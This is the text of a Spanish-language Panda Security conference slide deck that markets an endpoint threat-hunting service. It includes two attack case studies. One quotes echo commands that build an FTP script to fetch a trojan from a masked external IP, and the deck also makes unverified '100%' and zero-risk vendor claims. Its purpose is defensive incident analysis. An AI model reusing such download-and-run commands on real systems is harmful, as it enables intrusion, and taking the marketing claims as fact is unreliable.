shinue salas perez - infosecurity mexico...resumen de beneficios ligero. despliegue rapido, roi...
TRANSCRIPT
Shinue Salas PerezPanda Security
TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloCONOCER EN DONDE RESIDE LA RIQUEZA DE LAS
ORGANIZACIONES, PODRÁS DEFINIR UNA ESTRATEGIA DE
PROTECCIÓN PARA CADA ELEMENTO POR MUY PEQUEÑO
QUE PAREZCA.
RIQUEZA La riqueza en las naciones Históricamente
Ciudadanos & Territorioinsignificante
Ganado + Agricultura + Industria
Territorio + Personas
La riqueza en las naciones en la Actualidad
PROTAGONISTA El factor Humano
ACTORES Atrás quedaron los días de los virus y gusanos…
TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloLA CIBERSEGURIDAD NUNCA TIENE UN COSTO MAYOR QUE
EL DAÑO QUE PODEMOS SUFRIR.
INVERSIÓNAsegurar el Endpoint es el punto de partida.
Amenazas de Red Amenazas en el Endpoint
Ataques se enfocan
en el perímetro.
31% Inversión
de Seguridad
89%Ataques se enfocan
en el Endpoint.
69% Inversión
de Seguridad
11%
PLATAFORAS TECNOLOGICASPROTEGIENDO AL USUARIOEl enfoque tradicional de protección no funciona más
No funciona más.
Detección – Respuesta
Firmas Detección
Sigilozas – “Indetectables”
RETOSAyudando a las empresas a ser mas resistentes
TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloAQUELLOS QUE NO SON CONSCIENTES DE LA DESVENTAJA
DE SERVIRSE DE SUS RECURSOS NO PUEDEN SER TOTALMENTE
CONSCIENTES DE LAS VENTAJAS PARA UTILIZARLOS A SU
FAVOR.
CAMBIANDO EL ENFOQUE
La Triada Perfecta
PLATAFORMA TECNOLÓGICAS
Protegiendo al
usuario sin importar
donde resida.
Agente ligero – Cloud Computing
EVENTOS
Clie
nte
s
Eventos Almacenados
Histórico
Flujo de Eventos
• Procesos• Creación• Injection
• Archivos• Creación• Modificación• Apertura
• Comunicaciones• IPs Origen y Destino• URLs de Descarga
• Registro• Creación• Modificación
• H. Administrativas• Instalación• Actividad
Un nuevo enfoque para la seguridad de Endpoint
AUTOMATIZACION PROCESOS
PARADIGMA PREVALECE
… se basa en detección puntual solo de
procesos maliciosos conocidos, significa:
• Toda actividad sospechosa tiene que
investigarse caso por caso.
• Todos los procesos desconocidos estan
permitidos. Los atacantes burlan fácilmenteeste modelo.
Sospechoso
Malware
Desconocido
Mayor Riesgo
Mayor Esfuerzo
• El resultado es una mayor tasa de
éxito en los ataques.
Enfoque tradicional del Endpoint
NUEVO PARADIGMA100% Attestation Service
Esta basado clasificación de todos los procesos en
ejecución en su red.
• Actividad de todos los programas es
monitorizada y analizada en tiempo real.
• Todo comportamiento verificado por un servicio
gestionado, los administradores no investigannada.
• Mayor nivel de protección con menos esfuerzo.
Sospechoso
Malware
Desconocido
Riesgo Cero
Goodware
100% Procesos
Clasificados . Servicio Gestionado
Visibilidad Tiempo Real & Analisis Forense
• No se puede ejecutar una aplicación al
menos que sea confiable.
Misión: Ejecución de binarios Certificados por PandaNo es mágia. Visibilidad, Conocimiento y Automatización
Comportamiento, Análisis contextual, ML
Cloud determina binaries, tiempo real
Todos binarios clasificados (MW/GW)
El Servicio classifica el 100% de los binarios
Endpoint NO se ha VISTO infectado por
malware
El Servicio es parte de la solución:- No add-on, sin costos ocultos- No delega tareas adicionales- No alertas abrumadoras
Inteligencia Colectiva - Nube
Repositorio MW&GW
Binario: 10,000 atributos
PERSONAS SERVICIOS
Threat Hunters
Plataforma Inteligente Global Big Data un medio Supervisa Continuamente
Big Data para un fin. Internos o Externos.
THREAT HUNTING Servicio de Adaptive Defense
Monitoriza continuamente el Sistema para identificar ataques de seguridad.
Encuentra ataques que no usan malware.Beneficios
Detección de Hackers• Ataques de nueva generación o sin malware.
• Movimientos Laterales
Identificación de empleados maliciosos
• Modelado de comportamiento de usuario: User
Attestation.
• Control de identidad: Control del dato.
Misión: Buscar y Responder a los atacantes
¿Por qué el Servicio de Threat Hunting?
Ataques Malwareless – herramientas
administrativas - evaden las tecnologías de
seguridad.
El Servicio de Threat Hunting de forma PROACTIVA
detecta ataques sin malware y/o en etapas
tempranas del ciberataque, antes de que
PRODUZCAN daños y pérdidas.
Threat Hunting
SOLO ES POSIBLE SI LA ORGANIZACIÓN TIENE
Tecnologías, Personas y Procesos
PANDA ADAPTIVE DEFENSE
Prevención
Confiabilidad de Aplicación
Aplicaciones ConfiablesElimina el gap de detección
Detección
Trazabilidad Total
Monitorización Real (no sandboxing)
Análisis Forense
Integración con SIEM
RespuestaGestión
Compatible con otros productos de
seguridad
Instalación Inmediata y sencilla
Gestionado: Llevado a cabo por analistas de
Panda
Desatendido: Alertas confirmadas.
Servicio
TÍTULO TÍTULO TITULOSubtítulo Subtítulo Subtítulo
EXPONIENDO AL ENEMIGO
"SI CONOCES AL ENEMIGO Y TE CONOCES A TI MISMO, NI EN CIEN BATALLAS CORRERÁS PELIGRO. SI TE CONOCES A TI MISMO PERO NO CONOCES AL ENEMIGO, PERDERÁS UNA BATALLA Y GANARÁS OTRA".
SUN TZU
Reconocimiento Preparación Entrega Explotación Instalación
Comando y
Control (C&C)Acciones en
el objetivo
Adaptive Defense
Modo LearningNo hay bloqueo, monitoriza
todo lo ejecutado.
Ataque explicado siguiendo el modelo de Cyber Kill Chain
Threat Hunting Cyber Kill Chain
Entrega ExplotaciónEntrega• Spear Phishing
• Vector de entrada eficaz.
• Cinco trabajadores seleccionados en la fase
de reconocimiento reciben un correo con
una URL en el cuerpo del mensaje.
• Cinco acceden a la URL.
• Dos descargan un fichero HTA (html + script).
Explotación
• Los dos usuarios que ejecutan el script se
infectan:
• Inyecta una shellcode maliciosa (MW)
en ciertos procesos confiables (GW).
Threat Hunting Cyber Kill Chain
Instalación
Instalación
• Reconocimiento: el proceso se conecta a un
C&C y sube información del equipo
(nombre, dominio, grupos de dominio,
configuración de red, información de
hardware…).
• Uno de los dos usuarios no es interesante
para los atacantes, no movimientos laterales
con él y no continúan el ataque.
• El segundo usuario infectado, descarga un
script de powershell en memoria.
• Robar credenciales del equipo.
• Envía a su C&C.
• Descarga un par de troyanos/backdoor.
• Instala alrededor de 20 equipos de la red de
forma remota con las credenciales robadas
(movimiento lateral).
Threat Hunting Cyber Kill Chain
Comando y
Control (C&C)Acciones en
el objetivo
C & C
• Se ejecutan los troyanos/backdoors en los 20 equipos.
• Se conectan al C&C.
• Abren Shell remotas para que el
atacante tome el control.
• El atacante puede ejecutar en todas
las máquinas.
Acciones en el objetivo:
• Crea un túnel inverso y conectándose a otro
servidor para extraer información.• Roba información de ciertas máquinas de la red.
Threat Hunting Cyber Kill Chain
Reconocimiento Preparación Entrega Explotación Instalación
Comando y
Control (C&C)Acciones en
el objetivo
Adaptive Defense
Modo Learning
No hay bloqueo, monitoriza
todo lo ejecutado.
Investigación:
• El equipo de Threat Hunting investiga el ataque y
determina que e trata de un Red Team de otra
empresa de seguridad.
• Se informa al cliente de la actividad del Red Team.
Conclusión
Threat Hunting Cyber Kill Chain
Incremento del número de conexiones.La mayoría provienen de la misma región.
Descubrimiento
Threat Hunting: Intrusión de servidor SQL
Resumen
Servidor de Base de Datos: SQL Server 2008 R2 (RTM).
SQL Server expuesto a Internet y comprometido por un atacante.
Fuerza bruta obtiene las credenciales del Servidor SQL.
Malware para comunicarse a su Centro de Comando & Control
(BOTNET).
Creación de tareas programadas para ejecutar Script/Malware.
Threat Hunting: Intrusión de servidor SQL
Investigación: El Servidor es comprometido
Shell SQLServer, podría ejecutar comandos:
Cambios en el registro del SO
Creación de un archivo .ini con comandos echo
Inicia el archivo ini con comando FTP -s y
también p.exe (una copia de FTP.exe antes)
Diferentes técnicas para obtener el troyano
zd.exe desde la IP Externa
Programa una tarea para iniciar periódicamente
el troyano con el comando schtasks.exe
Threat Hunting: Intrusión de servidor SQL
Análisis: Script – Malware – IP Externa
echo open XXX.XX.XX.XXX > c:\Windows\Vl1433.iniecho XXX>> c:\Windows\Vl1433.iniecho XXX>> c:\Windows\Vl1433.iniecho binary >> c:\Windows\Vl1433.iniecho get zd.exe c:\zd.exe>> c:\Windows\Vl1433.iniecho bye >> c:\Windows\Vl1433.ini
Version Info
FileDescription 微软雅宋冬青黑体
FileMajorPart 1
FileMinorPart 0
FilePrivatePart 215
FileVersion 1, 0, 0, 215
InternalName
Language Chino (simplificado, China)
LegalCopyright Copyright (C) 2016 华文细黑
OriginalFilename
ProductMajorPart 1
ProductMinorPart 0
ProductName 微软雅宋冬青黑体
ProductPrivatepart 215
ProductVersion 1, 0, 0, 215
Threat Hunting: Intrusión de servidor SQL
Hipótesis – Indicadores de Ataque
Threat Hunting: Intrusión de servidor SQL
TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloLAS VICTORIAS NO SE DEBEN A LA SUERTE, SINO HABERSE SITUADO
PREVIAMENTE EN LA POSICIÓN DE GANAR CON SEGURIDAD, IMPONIENDOSE SOBRE LO QUE YA HAN PERDIDO DE ANTEMANO.
Panda Adaptive DefenseResumen de beneficios
Ligero. Despliegue
rapido, ROI corto plazo.
Integra Prevención,
Detección, Respuesta y
Servicios Gestionados
Visibilidad del pasado
y presente de la
actividad del Endpoint
Se adapta a la evolución de
ataques basado en archivos,
memoria y sin malware.
Asegura la confiabilidad del
proceso.
Detecta y Responde a hackers y
usuarios mal ntencionados.
Maximiza Prevención,
Minimiza el tiempo para
Detectar y Responder.
Reduce TCO.
Análisis de Causa Raíz,
detección de anomalías y
reducción de la superficie
de ataque.
No es delegado al
administrador, sin interupción.
Alertas confirmadas.
Solución 100% Cloud.
Tecnologías locales,
Plataforma de Big
Data, ML Cloud.
100% Attestation Service Threat Hunting & Investigation Service
#PandaenInfosecurity
TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloGRACIAS